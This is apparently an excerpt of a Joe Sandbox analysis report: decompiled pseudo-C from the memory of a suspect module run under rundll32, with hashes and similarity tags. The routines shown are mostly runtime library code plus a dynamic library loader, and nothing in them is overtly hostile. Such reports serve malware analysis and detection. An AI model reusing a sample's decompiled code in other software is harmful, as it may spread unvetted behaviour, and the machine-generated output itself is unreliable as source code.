                                        				_t55 = __rdx;
                                        				if (__rdx != 0) goto 0x38821bda;
                                        				if (__r8 == 0) goto 0x38821bda;
                                        				if (__rcx == 0) goto 0x38821bd3;
                                        				 *__rcx =  *__rcx & __edx;
                                        				goto 0x38821c69;
                                        				if (__rcx == 0) goto 0x38821be2;
                                        				 *__rcx =  *__rcx | 0xffffffff;
                                        				if (__r8 - 0x7fffffff <= 0) goto 0x38821bfe;
                                        				_t17 = E000001C31C338818984(__rax);
                                        				 *__rax = 0x16;
                                        				E000001C31C338811BC8(_t17);
                                        				goto 0x38821c67;
                                        				E000001C31C338811664(__rax, __rcx,  &_v40, _a40);
                                        				_t43 = _v32;
                                        				if ( *((long long*)(_t43 + 0x138)) != 0) goto 0x38821c98;
                                        				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0x38821c7b;
                                        				if (_t55 == 0) goto 0x38821c48;
                                        				if (__r8 == 0) goto 0x38821c48;
                                        				E000001C31C33880E410(0xff, 0, __edi, __esp, _t55, _a40, __r8, __r8);
                                        				E000001C31C338818984(_t43);
                                        				 *_t43 = 0x2a;
                                        				if (_v16 == 0) goto 0x38821c67;
                                        				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
                                        				return 0x2a;
                                        			}











                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                        • String ID:
                                        • API String ID: 4141327611-0
                                        • Opcode ID: 49d77ae0b775df07605cd79664d0e3d06cc87af61a22bad7434ff002173df99d
                                        • Instruction ID: 9b8565394e9a632594c5e6d64f94a7322142c37fc8aefa6bf954258b7fdb98a7
                                        • Opcode Fuzzy Hash: 49d77ae0b775df07605cd79664d0e3d06cc87af61a22bad7434ff002173df99d
                                        • Instruction Fuzzy Hash: 0541D63E2447C086FB659F50D080BE9A2A0FB81B94F34E126DEB50FAD5DB3CDA418706
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E000001C31C3386F8800(long long __rbx, long long* __rcx, signed long long __rdx, long long _a8, long long _a16, long long _a24) {
                                        				long long _v56;
                                        				void* __rdi;
                                        				void* __rsi;
                                        				void* _t22;
                                        				void* _t23;
                                        				long long _t34;
                                        				long long _t36;
                                        				long long _t37;
                                        				signed long long _t41;
                                        				long long _t50;
                                        				signed long long _t51;
                                        				void* _t61;
                                        				intOrPtr _t62;
                                        				long long* _t67;
                                        
                                        				_a16 = __rdx;
                                        				_v56 = 0xfffffffe;
                                        				_a8 = __rbx;
                                        				_t51 = __rdx;
                                        				_t67 = __rcx;
                                        				if (__rdx != 0) goto 0x386f882e;
                                        				goto 0x386f8880;
                                        				if (__rdx - 0xffffffff <= 0) goto 0x386f8843;
                                        				E000001C31C33880A170(0xffffffff);
                                        				asm("int3");
                                        				_t41 = _t51 << 6;
                                        				if (_t41 - 0x1000 < 0) goto 0x386f8878;
                                        				_t4 = _t41 + 0x27; // 0x400000000000026
                                        				_t34 = _t4;
                                        				if (_t34 - _t41 > 0) goto 0x386f8862;
                                        				E000001C31C33880A170(_t34);
                                        				asm("int3");
                                        				E000001C31C33880B674(_t34, _t34);
                                        				_t5 = _t34 + 0x27; // 0x27
                                        				 *((long long*)((_t5 & 0xffffffe0) - 8)) = _t34;
                                        				goto 0x386f8880;
                                        				E000001C31C33880B674(_t34, _t34);
                                        				_t50 = _t34;
                                        				_a24 = _t50;
                                        				E000001C31C338703A30( *_t67,  *((intOrPtr*)(_t67 + 8)), _t50, _t61);
                                        				_t62 =  *((intOrPtr*)(_t67 + 8));
                                        				_t36 =  *_t67;
                                        				if (_t36 == 0) goto 0x386f88dd;
                                        				_a16 = _t36;
                                        				if (_t36 == _t62) goto 0x386f88ca;
                                        				E000001C31C338704710(_t23, _t36, _t36, _t50, _t51);
                                        				_t37 = _t36 + 0x40;
                                        				_a16 = _t37;
                                        				if (_t37 != _t62) goto 0x386f88b4;
                                        				_t22 = E000001C31C3386E70C0(_t23, _t37,  *_t67,  *((intOrPtr*)(_t67 + 0x10)) -  *_t67 >> 6);
                                        				 *((long long*)(_t67 + 0x10)) = (_t51 << 6) + _t50;
                                        				 *((long long*)(_t67 + 8)) = (_t62 - _t36 & 0xffffffc0) + _t50;
                                        				 *_t67 = _t50;
                                        				return _t22;
                                        			}

















                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-0
                                        • Opcode ID: 48a37dec6020044c0c980d13ebb934533fd7488994d19ec560aa4c994f3cfae3
                                        • Instruction ID: 550516981a63c5000f19c15da3ccf21e8470f8c47f93e8a40466c8a2767a9210
                                        • Opcode Fuzzy Hash: 48a37dec6020044c0c980d13ebb934533fd7488994d19ec560aa4c994f3cfae3
                                        • Instruction Fuzzy Hash: 9221A0B2B417D081FA14DB55B404AD966A4BB447F0F25A7229F790BBD9DF38C662C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E000001C31C338700570(long long __rbx, long long* __rcx, signed long long __rdx, long long _a8, long long _a16, long long _a24) {
                                        				long long _v40;
                                        				void* _t22;
                                        				void* _t24;
                                        				void* _t26;
                                        				long long _t34;
                                        				long long _t40;
                                        				signed int _t43;
                                        				signed long long _t46;
                                        				long long _t48;
                                        				long long* _t49;
                                        				signed long long _t50;
                                        
                                        				_t46 = __rdx;
                                        				_a16 = __rdx;
                                        				_v40 = 0xfffffffe;
                                        				_a8 = __rbx;
                                        				_t50 = __rdx;
                                        				_t49 = __rcx;
                                        				if (__rdx != 0) goto 0x3870059a;
                                        				goto 0x387005ed;
                                        				if (__rdx - 0xffffffff <= 0) goto 0x387005af;
                                        				E000001C31C33880A170(0xffffffff);
                                        				asm("int3");
                                        				_t43 = _t46 * 8;
                                        				if (_t43 - 0x1000 < 0) goto 0x387005e5;
                                        				_t34 = _t43 + 0x27;
                                        				if (_t34 - _t43 > 0) goto 0x387005cf;
                                        				E000001C31C33880A170(_t34);
                                        				asm("int3");
                                        				E000001C31C33880B674(_t34, _t34);
                                        				_t6 = _t34 + 0x27; // 0x27
                                        				 *((long long*)((_t6 & 0xffffffe0) - 8)) = _t34;
                                        				goto 0x387005ed;
                                        				_t22 = E000001C31C33880B674(_t34, _t34);
                                        				_t40 = _t34;
                                        				_a24 = _t40;
                                        				E000001C31C338706760(_t22,  *_t49,  *((intOrPtr*)(_t49 + 8)), _t40);
                                        				_t48 =  *_t49;
                                        				if (_t48 == 0) goto 0x38700625;
                                        				_t24 = E000001C31C3387006E0(_t26, _t48,  *((intOrPtr*)(_t49 + 0x10)) - _t48 >> 3);
                                        				 *((long long*)(_t49 + 0x10)) = _t40 + _t50 * 8;
                                        				 *((long long*)(_t49 + 8)) = _t40 + ( *((intOrPtr*)(_t49 + 8)) - _t48 >> 3) * 8;
                                        				 *_t49 = _t40;
                                        				return _t24;
                                        			}














                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-0
                                        • Opcode ID: 89cfd26d850f7974e19e0b8867d82d8511561a90e7ace9660613bfa6d740ea21
                                        • Instruction ID: 5c35df123ef657386d6912eca9459672b172449ca5973a2368819cc9f894d880
                                        • Opcode Fuzzy Hash: 89cfd26d850f7974e19e0b8867d82d8511561a90e7ace9660613bfa6d740ea21
                                        • Instruction Fuzzy Hash: 8A21A9F2640BC095FA18DB66E548BCD6262B7487F0F54A7229BBD077D5DF38C2618302
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E000001C31C3387182C8(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, intOrPtr _a8, long long _a24) {
                                        				void* _v8;
                                        				char _v112;
                                        				char _v144;
                                        				long long _v152;
                                        				void* _t25;
                                        				long long _t31;
                                        				long long* _t35;
                                        				intOrPtr _t38;
                                        				long long _t46;
                                        				long long _t50;
                                        				void* _t53;
                                        
                                        				_t31 = _t50;
                                        				_v152 = 0xfffffffe;
                                        				 *((long long*)(_t31 + 0x10)) = __rbx;
                                        				 *((long long*)(_t31 + 0x20)) = __rsi;
                                        				_t35 = __rcx;
                                        				 *(_t31 + 8) =  *(_t31 + 8) & 0x00000000;
                                        				if (__rcx == 0) goto 0x38718389;
                                        				if ( *__rcx != 0) goto 0x38718389;
                                        				E000001C31C33880B674(_t31, __rcx);
                                        				_t46 = _t31;
                                        				_a24 = _t31;
                                        				_t38 =  *((intOrPtr*)(__rdx + 8));
                                        				if (_t38 != 0) goto 0x38718328;
                                        				goto 0x38718335;
                                        				if ( *((intOrPtr*)(_t38 + 0x28)) != 0) goto 0x38718335;
                                        				E000001C31C338718114(_t31, _t35,  &_v112, _t38 + 0x30);
                                        				_a8 = 1;
                                        				 *_t46 = 0x3889e168;
                                        				 *(_t46 + 8) =  *(_t46 + 8) & 0x00000000;
                                        				 *_t46 = 0x3889e1f8;
                                        				E000001C31C33880A8FC(0x3889e1f8,  &_v144, _t38 + 0x30, _t53);
                                        				asm("movups xmm0, [eax]");
                                        				asm("movups [edi+0x10], xmm0");
                                        				asm("movups xmm1, [eax+0x10]");
                                        				asm("movups [edi+0x20], xmm1");
                                        				 *_t35 = _t46;
                                        				E000001C31C3387181AC(_t25,  &_v112);
                                        				return 2;
                                        			}














                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Locinfostd::_$GetctypeLocinfo::_Locinfo::~_
                                        • String ID:
                                        • API String ID: 1079120975-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000001C31C3386E5C20(void* __rcx, void* __rdx) {
                                        
                                        				if (__rcx != 0) goto 0x386e5c33;
                                        				return 0;
                                        			}



                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Similarity
                                        • API ID: ConditionMask$InfoVerifyVersion
                                        • String ID:
                                        • API String ID: 2793162063-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 18%
                                        			E000001C31C33871C1EC(long long __rbx, void* __rcx, signed long long* __rdx, long long __rsi, long long _a24, long long _a32) {
                                        				void* _v8;
                                        				signed long long _v24;
                                        				char _v280;
                                        				void* __rdi;
                                        				struct HINSTANCE__* _t16;
                                        				void* _t17;
                                        				void* _t18;
                                        				void* _t21;
                                        				void* _t22;
                                        				signed long long _t27;
                                        				signed long long _t28;
                                        				void* _t47;
                                        				void* _t52;
                                        				void* _t55;
                                        				void* _t56;
                                        
                                        				_a24 = __rbx;
                                        				_a32 = __rsi;
                                        				_t27 =  *0x38903000; // 0x9bfaf736ae76
                                        				_t28 = _t27 ^ _t52 - 0x00000130;
                                        				_v24 = _t28;
                                        				r8d = 0x100;
                                        				E000001C31C33880E410(_t18, 0, _t21, _t22,  &_v280, __rdx, _t47, _t55);
                                        				lstrcpyA(??, ??);
                                        				__imp__StrChrA();
                                        				if (_t28 != 0) goto 0x3871c252;
                                        				goto 0x3871c28b;
                                        				 *_t28 = 0;
                                        				_t16 = LoadLibraryA(??);
                                        				if (_t28 == 0) goto 0x3871c24e;
                                        				if ( *((char*)(_t28 + 1)) != 0x23) goto 0x3871c27d;
                                        				__imp__StrToIntA();
                                        				 *__rdx = _t28;
                                        				_t17 = E000001C31C33871C2B0(0x2e, __rdx, _t16, _t56);
                                        				E000001C31C33880C290();
                                        				return _t17;
                                        			}


















                                        APIs
                                        Similarity
                                        • API ID: LibraryLoadlstrcpy
                                        • String ID:
                                        • API String ID: 304781146-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E000001C31C338826870(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                                        				void* _t4;
                                        				void* _t9;
                                        				intOrPtr _t11;
                                        				intOrPtr _t14;
                                        				void* _t23;
                                        				void* _t29;
                                        				void* _t32;
                                        				void* _t33;
                                        
                                        				_t29 = __rdx;
                                        				_t27 = __rcx;
                                        				_t25 = __rbx;
                                        				_t23 = __rax;
                                        				_a8 = __rbx;
                                        				GetLastError();
                                        				_t11 =  *0x389032b0; // 0x7
                                        				if (_t11 == 0xffffffff) goto 0x3882689a;
                                        				_t4 = E000001C31C338826F7C(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
                                        				if (__rax != 0) goto 0x388268db;
                                        				E000001C31C338822114(_t4, _t27, _t29);
                                        				_t32 = _t23;
                                        				if (_t23 != 0) goto 0x388268ba;
                                        				E000001C31C338824EE0(_t23, _t27);
                                        				goto 0x388268f6;
                                        				_t14 =  *0x389032b0; // 0x7
                                        				if (E000001C31C338826FD4(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x388268b3;
                                        				E000001C31C3388265DC(_t32, _t23);
                                        				_t9 = E000001C31C338824EE0(_t23, _t32);
                                        				if (_t32 == 0) goto 0x388268f6;
                                        				SetLastError(??);
                                        				return _t9;
                                        			}











                                        APIs
                                        Similarity
                                        • API ID: ErrorLast$abort
                                        • String ID:
                                        • API String ID: 1447195878-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000001C31C3386E88E0(void* __rdx) {
                                        
                                        				if (__rdx != 0) goto 0x386e88f2;
                                        				return 0;
                                        			}



                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 83%
                                        			E000001C31C33882803C(void* __edx, void* __edi, void* __esp, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72) {
                                        				void* _v24;
                                        				intOrPtr _v32;
                                        				intOrPtr _v48;
                                        				intOrPtr _v56;
                                        				long long _v72;
                                        				intOrPtr _v80;
                                        				intOrPtr _v88;
                                        				intOrPtr _v96;
                                        				long long _v104;
                                        				void* _t62;
                                        				void* _t65;
                                        				void* _t69;
                                        				char _t70;
                                        				char _t73;
                                        				signed char _t75;
                                        				void* _t86;
                                        				intOrPtr _t87;
                                        				void* _t88;
                                        				signed int _t96;
                                        				void* _t124;
                                        				intOrPtr* _t139;
                                        				char* _t143;
                                        				long long _t171;
                                        				signed long long _t174;
                                        				intOrPtr* _t178;
                                        				char* _t179;
                                        				signed long long _t184;
                                        				void* _t185;
                                        				signed long long _t192;
                                        				signed long long _t194;
                                        				signed long long _t197;
                                        				signed long long _t201;
                                        				intOrPtr* _t202;
                                        				char* _t203;
                                        				intOrPtr* _t204;
                                        				char* _t205;
                                        				void* _t206;
                                        				char* _t208;
                                        				void* _t209;
                                        				char* _t210;
                                        				char* _t211;
                                        				char* _t212;
                                        				char* _t213;
                                        				unsigned int* _t216;
                                        				void* _t219;
                                        				intOrPtr* _t221;
                                        				char* _t227;
                                        				long long _t235;
                                        				intOrPtr* _t239;
                                        				char* _t241;
                                        
                                        				_t171 = __rbx;
                                        				_t139 = _t221;
                                        				 *((long long*)(_t139 + 8)) = __rbx;
                                        				 *((long long*)(_t139 + 0x10)) = __rbp;
                                        				 *((long long*)(_t139 + 0x18)) = __rsi;
                                        				 *((long long*)(_t139 + 0x20)) = __rdi;
                                        				_push(_t235);
                                        				r12d = 0;
                                        				_t201 = __rdx;
                                        				 *((intOrPtr*)(__rdx)) = r12b;
                                        				_t216 = __rcx;
                                        				_t174 = _t139 - 0x38;
                                        				_t219 = __r8;
                                        				_t86 =  <  ? r12d : _a48;
                                        				E000001C31C338811664(_t139, __rbx, _t174, _a72);
                                        				if (__r8 - _t171 + 0xb > 0) goto 0x388280aa;
                                        				_t62 = E000001C31C338818984(_t139);
                                        				_t9 = _t235 + 0x22; // 0x22
                                        				_t87 = _t9;
                                        				 *_t139 = _t87;
                                        				E000001C31C338811BC8(_t62);
                                        				goto 0x38828365;
                                        				if (( *__rcx >> 0x00000034 & _t174) != _t174) goto 0x38828135;
                                        				_v72 = _t235;
                                        				_v80 = _a64;
                                        				_t192 = _t201;
                                        				_t143 = _a40;
                                        				_v88 = r12b;
                                        				_v96 = _t87;
                                        				_v104 = _t143;
                                        				_t65 = E000001C31C33882839C(_t171, __rcx, _t192, __rcx, __r8);
                                        				_t88 = _t65;
                                        				if (_t65 == 0) goto 0x38828103;
                                        				 *_t201 = r12b;
                                        				goto 0x38828365;
                                        				strrchr(_t241);
                                        				if (_t143 == 0) goto 0x38828362;
                                        				asm("sbb dl, dl");
                                        				 *_t143 = 0xd0;
                                        				 *((intOrPtr*)(_t143 + 3)) = r12b;
                                        				goto 0x38828362;
                                        				if (( *_t216 & 0x00000000) == 0) goto 0x3882814a;
                                        				 *_t201 = 0x2d;
                                        				_t202 = _t201 + 1;
                                        				r15b = _a56;
                                        				r10d = 0x30;
                                        				asm("sbb edx, edx");
                                        				if (( *_t216 & 0x00000000) != 0) goto 0x3882819d;
                                        				 *_t202 = r10b;
                                        				_t203 = _t202 + 1;
                                        				asm("dec eax");
                                        				goto 0x388281a3;
                                        				 *_t203 = 0x31;
                                        				_t204 = _t203 + 1;
                                        				_t239 = _t204;
                                        				_t205 = _t204 + 1;
                                        				if (_t88 != 0) goto 0x388281b2;
                                        				 *_t239 = r12b;
                                        				goto 0x388281c6;
                                        				 *_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xf8))))));
                                        				if (( *_t216 & 0xffffffff) <= 0) goto 0x38828259;
                                        				r8d = r10w & 0xffffffff;
                                        				if (_t88 <= 0) goto 0x3882820f;
                                        				_t69 =  ~r15b + r10w;
                                        				_t124 = _t69 - 0x39;
                                        				if (_t124 <= 0) goto 0x388281fd;
                                        				_t70 = _t69 + 0xffffffff000000e7;
                                        				 *_t205 = _t70;
                                        				_t206 = _t205 + 1;
                                        				r8w = r8w + 0xfffc;
                                        				if (_t124 >= 0) goto 0x388281dd;
                                        				if (r8w < 0) goto 0x38828259;
                                        				_t96 = r8b;
                                        				if (_t70 - 8 <= 0) goto 0x38828259;
                                        				_t28 = _t206 - 1; // 0x2
                                        				_t178 = _t28;
                                        				if (( *_t178 - 0x00000046 & 0x000000df) != 0) goto 0x3882823e;
                                        				 *_t178 = r10b;
                                        				_t179 = _t178 - 1;
                                        				goto 0x3882822e;
                                        				if (_t179 == _t239) goto 0x38828256;
                                        				_t73 =  *_t179;
                                        				if (_t73 != 0x39) goto 0x38828250;
                                        				 *_t179 = 0xffffffff00000121;
                                        				goto 0x38828259;
                                        				 *_t179 = _t73 + 1;
                                        				goto 0x38828259;
                                        				 *((char*)(_t179 - 1)) =  *((char*)(_t179 - 1)) + 1;
                                        				if (_t88 - 1 <= 0) goto 0x38828274;
                                        				_t75 = E000001C31C33880E410(_t96, r10b, __edi, __esp, _t206, _t192, _t206, _t171);
                                        				r10d = 0x30;
                                        				_t208 =  ==  ? _t239 : _t206 + _t171;
                                        				r15b =  ~r15b;
                                        				asm("sbb al, al");
                                        				 *_t208 = (_t75 & 0x000000e0) + 0x70;
                                        				if ( *_t239 - r12b < 0) goto 0x388282a2;
                                        				 *((char*)(_t208 + 1)) = 0x2b;
                                        				_t209 = _t208 + 2;
                                        				goto 0x388282ad;
                                        				 *((char*)(_t209 + 1)) = 0x2d;
                                        				_t210 = _t209 + 2;
                                        				_t184 =  ~(( *_t216 >> 0x34) - _t219);
                                        				 *_t210 = r10b;
                                        				_t227 = _t210;
                                        				if (_t184 - 0x3e8 < 0) goto 0x388282ef;
                                        				_t194 = (_t192 >> 7) + (_t192 >> 7 >> 0x3f);
                                        				 *_t210 = __r10 + _t194;
                                        				_t211 = _t210 + 1;
                                        				_t185 = _t184 + _t194 * 0xfffffc18;
                                        				if (_t211 != _t227) goto 0x388282f5;
                                        				if (_t185 - 0x64 < 0) goto 0x38828323;
                                        				_t197 = (_t194 + _t185 >> 6) + (_t194 + _t185 >> 6 >> 0x3f);
                                        				 *_t211 = __r10 + _t197;
                                        				_t212 = _t211 + 1;
                                        				if (_t212 != _t227) goto 0x3882832e;
                                        				if (_t185 + _t197 * 0xffffff9c - 0xa < 0) goto 0x38828359;
                                        				 *_t212 = __r10 + (_t197 >> 2) + (_t197 >> 2 >> 0x3f);
                                        				_t213 = _t212 + 1;
                                        				 *_t213 = (_t96 & 0x000007ff) + r10b;
                                        				 *((intOrPtr*)(_t213 + 1)) = r12b;
                                        				if (_v32 == r12b) goto 0x38828378;
                                        				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
                                        				return r12d;
                                        			}





















































                                        0x1c33882827b
                                        0x1c33882827e
                                        0x1c338828284
                                        0x1c338828296
                                        0x1c338828298
                                        0x1c33882829c
                                        0x1c3388282a0
                                        0x1c3388282a2
                                        0x1c3388282a6
                                        0x1c3388282aa
                                        0x1c3388282ad
                                        0x1c3388282b0
                                        0x1c3388282ba
                                        0x1c3388282d4
                                        0x1c3388282db
                                        0x1c3388282dd
                                        0x1c3388282e7
                                        0x1c3388282ed
                                        0x1c3388282f3
                                        0x1c338828310
                                        0x1c338828317
                                        0x1c338828319
                                        0x1c338828326
                                        0x1c33882832c
                                        0x1c33882834d
                                        0x1c33882834f
                                        0x1c33882835c
                                        0x1c33882835e
                                        0x1c33882836a
                                        0x1c338828371
                                        0x1c338828398

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: gfffffff
                                        • API String ID: 3215553584-1523873471
                                        • Opcode ID: 0394c0a12d31b090ba6d4f006549612a7ab558deccbf8bb91b018acd81be3e69
                                        • Instruction ID: a76af8be5386457e1e548492595462c6b094e5057678723eaba65e2862ea5e5b
                                        • Opcode Fuzzy Hash: 0394c0a12d31b090ba6d4f006549612a7ab558deccbf8bb91b018acd81be3e69
                                        • Instruction Fuzzy Hash: 8A9122726457C586FF258F29E540BEC6B95F765BC0F04E922CEA90B7E6DA38C611C302
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: *
                                        • API String ID: 3215553584-163128923
                                        • Opcode ID: d1b3c8bcca7984e45a2e1b92871d71e663809e6980a90e537f3949267acdaa75
                                        • Instruction ID: fef2ca62f9f5e41666c3fb42b946f075e417e61424aa695bc6a376e9c9b61968
                                        • Opcode Fuzzy Hash: d1b3c8bcca7984e45a2e1b92871d71e663809e6980a90e537f3949267acdaa75
                                        • Instruction Fuzzy Hash: B3718172181691C6F764CF248084AEC3BB2F345F48F25A117DE664B299DF31CB92C796
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 22%
                                        			E000001C31C338813CF0(void* __edx, signed int __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, void* __rbp, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
                                        				void* _t83;
                                        				unsigned int _t91;
                                        				signed int _t99;
                                        				signed int _t106;
                                        				signed int _t108;
                                        				signed int _t114;
                                        				signed int _t118;
                                        				unsigned int _t126;
                                        				intOrPtr* _t143;
                                        				void* _t150;
                                        				signed int _t162;
                                        				intOrPtr* _t165;
                                        				void* _t170;
                                        
                                        				_t162 = __rsi;
                                        				_t143 = _t165;
                                        				 *((long long*)(_t143 + 8)) = __rbx;
                                        				 *((long long*)(_t143 + 0x10)) = __rsi;
                                        				 *((long long*)(_t143 + 0x18)) = __rdi;
                                        				 *((long long*)(_t143 + 0x20)) = __r14;
                                        				_t150 = __rcx;
                                        				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0x38813d2f;
                                        				_t83 = E000001C31C338818984(_t143);
                                        				 *_t143 = 0x16;
                                        				E000001C31C338811BC8(_t83);
                                        				goto 0x38813f36;
                                        				if ( *((intOrPtr*)(__rcx + 0x18)) == __rsi) goto 0x38813d17;
                                        				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
                                        				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x38813f33;
                                        				_t118 = __edi | 0xffffffff;
                                        				r14d = __rdi + 0x21;
                                        				 *((intOrPtr*)(__rcx + 0x50)) = 0;
                                        				 *(__rcx + 0x2c) = 0;
                                        				goto 0x38813f07;
                                        				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 2;
                                        				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x38813f20;
                                        				if (( *(__rcx + 0x42) & 0x0000ffff) - r14w - 0x5a > 0) goto 0x38813d8f;
                                        				goto 0x38813d91;
                                        				_t91 = ( *(_t143 + 0x388a2990) & 0x000000ff) >> 4;
                                        				 *(__rcx + 0x2c) = _t91;
                                        				if (_t91 == 8) goto 0x38813f51;
                                        				_t126 = _t91;
                                        				if (_t126 == 0) goto 0x38813eb7;
                                        				if (_t126 == 0) goto 0x38813ea3;
                                        				if (_t126 == 0) goto 0x38813e64;
                                        				if (_t126 == 0) goto 0x38813e32;
                                        				if (_t126 == 0) goto 0x38813e2a;
                                        				if (_t126 == 0) goto 0x38813df9;
                                        				if (_t126 == 0) goto 0x38813dec;
                                        				if (_t91 - 0xfffffffffffffffc != 1) goto 0x38813f61;
                                        				0x388151b4(_t170);
                                        				goto 0x38813f03;
                                        				0x38814974();
                                        				goto 0x38813f03;
                                        				if ( *(__rcx + 0x42) == 0x2a) goto 0x38813e11;
                                        				E000001C31C33881385C(__rcx, __rcx, __rcx + 0x38, __rsi, __rbp);
                                        				goto 0x38813f03;
                                        				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
                                        				_t106 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
                                        				_t107 =  <  ? _t118 : _t106;
                                        				 *(__rcx + 0x38) =  <  ? _t118 : _t106;
                                        				goto 0x38813f01;
                                        				 *(__rcx + 0x38) = 0;
                                        				goto 0x38813f07;
                                        				if ( *(__rcx + 0x42) == 0x2a) goto 0x38813e3f;
                                        				goto 0x38813e04;
                                        				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
                                        				_t108 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
                                        				 *(__rcx + 0x34) = _t108;
                                        				if (_t108 >= 0) goto 0x38813f01;
                                        				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
                                        				 *(__rcx + 0x34) =  ~_t108;
                                        				goto 0x38813f01;
                                        				_t99 =  *(__rcx + 0x42) & 0x0000ffff;
                                        				if (_t99 == r14d) goto 0x38813e9d;
                                        				if (_t99 == 0x23) goto 0x38813e97;
                                        				if (_t99 == 0x2b) goto 0x38813e91;
                                        				if (_t99 == 0x2d) goto 0x38813e8b;
                                        				if (_t99 != 0x30) goto 0x38813f07;
                                        				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000008;
                                        				goto 0x38813f07;
                                        				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
                                        				goto 0x38813f07;
                                        				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000001;
                                        				goto 0x38813f07;
                                        				 *(__rcx + 0x30) =  *(__rcx + 0x30) | r14d;
                                        				goto 0x38813f07;
                                        				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000002;
                                        				goto 0x38813f07;
                                        				 *(__rcx + 0x30) = _t162;
                                        				 *((intOrPtr*)(__rcx + 0x40)) = sil;
                                        				 *(__rcx + 0x38) = _t118;
                                        				 *((intOrPtr*)(__rcx + 0x3c)) = 0;
                                        				 *((intOrPtr*)(__rcx + 0x54)) = sil;
                                        				goto 0x38813f07;
                                        				r8d =  *(__rcx + 0x42) & 0x0000ffff;
                                        				 *((char*)(__rcx + 0x54)) = 1;
                                        				if (( *( *((intOrPtr*)(__rcx + 0x468)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x38813edf;
                                        				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x468)) + 8)) == _t162) goto 0x38813efe;
